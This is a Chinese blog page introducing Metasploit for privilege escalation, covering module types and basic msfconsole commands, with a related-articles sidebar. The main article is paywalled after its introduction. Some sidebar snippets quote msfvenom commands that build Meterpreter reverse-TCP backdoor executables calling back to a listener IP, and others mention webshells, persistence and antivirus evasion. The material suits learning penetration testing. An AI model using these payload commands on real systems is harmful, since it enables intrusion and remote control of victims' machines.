提权学习之旅——利用Metasploit提权

最新推荐文章于 2024-01-05 09:45:49 发布
最新推荐文章于 2024-01-05 09:45:49 发布
阅读量689 收藏 3
点赞数 2
分类专栏: 提权 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43431158/article/details/108013774
版权
本文介绍了Metasploit的基础知识,包括其接口、模块类型以及基本命令。详细展示了如何利用MS16-016漏洞进行提权,包括生成payload、反弹shell、设置参数以及执行脚本的过程。通过实例演示了Metasploit在提权操作中的应用,最后进行了总结和对未来学习的展望。
摘要由CSDN通过智能技术生成

Metasploit基础

0x00:简介

Metasploit是一个漏洞利用框架,简称msf。是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击,,而且本身附带数百个已知软件漏洞的专业级漏洞攻击工具。是信息收集、漏洞扫描、权限提升、内网渗透等集成的工具。

msf一般会有四种接口对外提供,分别为

  • msfconsole
  • msfcli
  • msfgui
  • msfweb
0x01:模块
  • exploit
 利用程序,针对漏洞、权限进行利用
  • payload
用于在目标系统中运行任意命令或执行特定代码,主要用于shell获取
  • auxiliary
该模块包含了扫描、嗅探、指纹识别、网络协议欺骗等相关功能模块
  • encoder
该模块主要针对exploit模块进行代码免杀,以逃过杀毒软件、防火墙、ids等安全防护机制的检测
0x03:基础命令
search mysql #查找
use exploit/multi/handler #使用
info #查看信息
show exploits/payloads/options #显示可用信息
exploit/run #执行
exploit -j #后台运行
back #返回上一级
sessions -i #查看当前可用会话
sessions -K #杀死所有活跃会话

在这里插入图片描述

最低0.47元/天 解锁文章
lemonl1
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
48-2 内网渗透 - 利用Metasploit提权
weixin_43263566的博客
06-19 110
Metasploit是一个开源的安全漏洞检测工具,广泛用于安全和IT专业人士识别、验证和利用安全漏洞,同时也支持专家驱动的安全评估和管理。
利用Metasploit进行Linux提权
01-09
Metasploit 拥有msfpayload 和msfencode 这两个工具,这两个工具不但可以生成exe 型后门,一可以生成网页脚本类型的webshell ,通过生成webshell 然后设置监听器,访问webshell的url,幸运的话可以产生一个session,以便进一步利用。   下面是具体的利用方法。   我们可以通过指令查看msf里的payload 然后记住其位置:使用如下的指令来产生一个webshell,和前边将的msfpayload的用法类似,只不过这里生成的是一个网页脚本文件:   产生webshell   msfpayload windows/meterpret
Meterpreter 提权
eli的博客
05-20 2204
0x01 Meterpreter自动提权 1.生成后门程序 我们在kali的命令行下直接执行以下命令获得一个针对windows的反弹型木马: msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.11.2 lport=4444 -f exe -o /tmp/hack.exe 这里我们为生成的木马指定了payload为: windows/meterpreter/reverse_tcp,反弹到的监听端地址为172.16.11.2,监听端口为44
12.1、后渗透测试--提权
无痕的博客
12-13 737
meterpreter后渗透阶段提权
metasploit linux 提权(本文仅用于技术讨论与学习利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者及本公众号不为此承担任何责任。)
qq_73628117的博客
09-06 354
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。
Metasploit拿到shell后 低权限---提权
qq_58000413的博客
08-24 1517
下载地址https://github.com/AonCyberLabs/Windows-Exploit-Suggester1、安装xlrd包(注意python2、3版本的pip问题)使用python2 的pip来安装xlrd包命令:python2-m pip install xlrd==1.2.0注意:安装的xlrd版本必须为1.2.0版本,否则使用时会报错,原因是:最近xlrd更新到了2.0.1版本,只支持.xls文件。e.高级 -> 添加 -> 选择主体 -> 输入用户名,检查名称 -> 确定。
提权metasploit提权方法
孤桜懶契
08-22 828
前言 metasploit 提权使用 常用的提权模块 metasploit 提权EXP存储文件夹路径 find / -name metasploit 一般都在 /usr/share/metasploit-framework/modules/exploits/windows/local windows2003提权 环境:2003 server 1、生成攻击载荷 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.108 lpo
metasploit下Windows的多种提权方法
02-25
目标机:Win7在已经获取到一个meterpretershell后,假如session为1,且权限不是系统权限的前提下,使用以下列出的几种提权方法:本方法主要有以下3个模块。上面这些模块的详细信息在metasploit里已有介绍,这里不再...
常见windwos提权笔记
最新发布
03-30
### 常见Windows提权方法详解 #### 一、提权概述 **提权**,即提升权限,指的是在获得目标系统较低级别权限的基础上,进一步获取更高级别的权限,通常是为了达到对整个系统的完全控制。对于Windows系统而言,提权...
Oracle 低权限数据库账户得到 OS 访问权限 提权利用
09-11
大概意思就是说,如果 ORACLE 服务是用 administrator 账户启动的,你只要有一个具有 resource 和 connect 权限的数据库账户,就能利用 metasploit 的 smbrelay 功能,本地搭建一个 SMB 欺骗服务器, 来得到系统的访问...
利用meterperter进行win7系统提权
weixin_63137680的博客
10-30 1741
利用meterpreter对win7系统进行提权
Metasploit提权
weixin_51151498的博客
08-25 307
windows
渗透测试Metasploit框架体验(5.理解MSF后渗透-之提权
weixin_51803729的博客
02-12 5240
渗透测试Metasploit框架体验(5.理解MSF后渗透-之提权
Metasploit提权和后渗透
Kali与编程
12-04 1539
后渗透技术包括提权、横向移动、持久化、数据窃取、漏洞利用等,攻击者可以利用这些技术和工具深入系统内部,并获取系统中的敏感信息、提高攻击者的权限、绕过防御措施等。在本文中,我将详细介绍Metasploit提权模块和技术,包括Windows和Linux系统下的提权模块和技术,以及如何使用Metasploit进行提权攻击。横向移动是指攻击者在入侵一个系统后,通过利用系统内部的漏洞或者获取其他用户的登录名和密码等方式,从一个系统进入另一个系统,进而攻击其他系统。
Linux 提权
qq_53742230的博客
07-17 2301
Linux 的一些常用提权手法
117.网络安全渗透测试—[权限提升篇15]—[Ubuntu15.04 Metasploit提权]
qwsn
07-08 3679
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。php马: elf马:#msfconsole,开启Metasploit控制台 如下图所示,我们首先上传shellx.php攻击载荷到靶机:
Metapreter实现持续访问,自动化,提权--详细教程
qq_41245301的博客
01-05 634
1.先拿到目标主机的控制权限后,将目标主机的会话转入后台,切换到 exploit/windows/local/persistence 模块,注意这个模块选择的payload,因为在后面进行监听的时候需要和这个payload相同。EXE_NAME 生成后门文件的文件名称(非必要,用默认)REG_NAME 注册表设置的名称 (非必要,用默认)VBS_NAME VBS脚本的名称 (非必要,用默认)PATH 后门文件的存放路径 (非必要,用默认)SESSION 作用于那个会话。这里会自动执行文件中的命令。
初学MSF之渗透、提权、免杀(上)
qq_53058639的博客
08-01 1892
Metasploit是一个免费的、可下载的渗透测试框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数千个已知软件漏洞的专业级漏洞攻击工具,并且MSF团队始终在更新MSF的漏洞库,这使得MSF始终充满生机。通俗的讲,MSF就是一个集成了渗透测试全流程的渗透工具,理论上讲,我们可以只依靠MSF完成从信息收集到最终的制作后门并清理入侵痕迹的渗透测试全过程。
使用Metasploit在Linux上进行提权的详细步骤
"关于使用Metasploit在Linux系统中进行提权的教程" 在网络安全领域,Metasploit是一个强大的开源框架,主要用于漏洞利用和渗透测试。它为安全专家提供了丰富的工具和模块,帮助他们发现、验证和利用系统中的安全...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值